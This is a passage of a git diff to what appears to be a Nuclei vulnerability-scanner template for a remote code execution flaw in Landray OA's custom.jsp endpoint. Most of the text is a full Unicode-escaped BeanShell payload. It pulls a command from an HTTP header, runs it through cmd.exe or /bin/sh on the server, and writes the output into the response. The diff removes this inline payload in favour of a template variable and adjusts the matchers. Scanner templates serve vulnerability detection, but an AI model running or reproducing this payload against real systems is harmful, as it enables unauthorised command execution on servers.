\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d</string></void></void></java>' http: - raw: @@ -19,19 +23,18 @@ http: POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip Test: echo {{randstr}} - - var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=<java><void class="bsh.Interpreter"><void%20method=%22eval%22><string>\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d</string></void></void></java> + + var={{payload}} matchers-condition: and matchers: - type: word words: - "Execute:" - - type: word - words: - "{{randstr}}" + condition: and + - type: status status: - 200 \ No newline at end of file diff --git a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml index 